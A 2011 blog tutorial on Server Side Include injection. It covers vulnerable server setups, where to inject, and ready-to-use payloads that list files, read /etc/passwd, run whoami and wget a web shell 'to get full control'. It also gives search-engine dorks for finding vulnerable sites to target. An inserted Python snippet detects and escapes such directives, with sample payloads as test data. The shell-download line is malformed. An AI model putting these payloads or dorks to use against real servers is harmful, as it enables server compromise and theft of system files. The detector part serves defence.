
Monday, 12 December 2011

server side inclusion


Server Side Includes


What is It?


A Server Side Include attack is an extremely useful attack for executing commands on the server. To do this, you need basic knowledge of Bash or Batch to know which commands could help compromise the server.


What Sites are Vulnerable?


For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes allowed in the config file, or the file extension must end in '.shtml', '.shtm' or '.stm'. Apache, lighttpd and IIS all support SSI.


Testing for SSI Injection


To audit a site to check whether it is vulnerable to SSI Injection, search all the directories for '.shtml', '.shtm' or '.stm' extensions. If you find any, SSI is probably enabled; if you don't find any, it may still be enabled. It affects pages with unsanitized requests (e.g. no filters, such as filtering of <!--#exec ... -->). To test, enter the following command into the request:


<!--#exec cmd="ls" -->


If filesystem output appears, then it is vulnerable. If the server is Windows, replace 'ls' with 'dir'.
You test for SSI the same way as XSS; you can post the command into:


- Textboxes/search boxes
- Headers
- Cookies
- Address Bar
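
A defensive counterpart to the test above, as an added example that is not part of the original post: it flags SSI directives arriving through the input locations just listed, including URL-encoded and double-encoded forms, and shows the output escaping that renders them inert. The request dictionaries, field names and function names are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote_plus

# Elements of Apache mod_include; exec and include are the ones used on this page.
# Whitespace is tolerated so near-miss probes are flagged too.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(exec|include|echo|config|fsize|flastmod|printenv|set)\b",
    re.IGNORECASE,
)

def decode_layers(value, max_rounds=3):
    """URL-decode repeatedly so %3C and double-encoded %253C both surface."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(request):
    """Return (location, field, directive) for every input carrying an SSI directive."""
    hits = []
    for location in ("query", "form", "headers", "cookies"):
        for field, raw in request.get(location, {}).items():
            match = SSI_DIRECTIVE.search(decode_layers(raw))
            if match:
                hits.append((location, field, match.group(1).lower()))
    return hits

def neutralize(value):
    """HTML-escape before echoing input into a page, so '<!--#' becomes inert text."""
    return html.escape(value, quote=True)

# Constructed sample requests (not captured traffic).
SAMPLE_REQUESTS = [
    {"query": {"q": "shoes"}, "headers": {"User-Agent": "Mozilla/5.0"}},
    {"query": {"q": '<!--#exec cmd="ls" -->'}},
    {"form": {"comment": "%3C!--%23exec%20cmd%3D%22dir%22%20--%3E"}},
    {"headers": {"Referer": "%253C!--%2523include%2520virtual%253D%2522/etc/passwd%2522--%253E"}},
    {"cookies": {"theme": "dark"}, "query": {"note": "<!-- plain comment -->"}},
]

if __name__ == "__main__":
    for number, request in enumerate(SAMPLE_REQUESTS, 1):
        print(number, find_ssi(request) or "clean")
    print(neutralize('<!--#exec cmd="ls" -->'))
```
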


Useful Commands


Show Files Linux


<!--#exec cmd="ls" -->


Show Files Windows


<!--#exec cmd="dir" -->


Read /etc/passwd


<!--#include virtual="/etc/passwd" -->


Which User the Web Server Is Running As


<!--#exec cmd="whoami" -->


Download a shell to the server to get full control


<!--#exec cmd="wget "shell.php"" -->


Dorks


Similar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection:


inurl:index.shtml
inurl:index.shtm
inurl:index.stm


There are many others, but you can just use your imagination.


Hope you liked this tutorial.
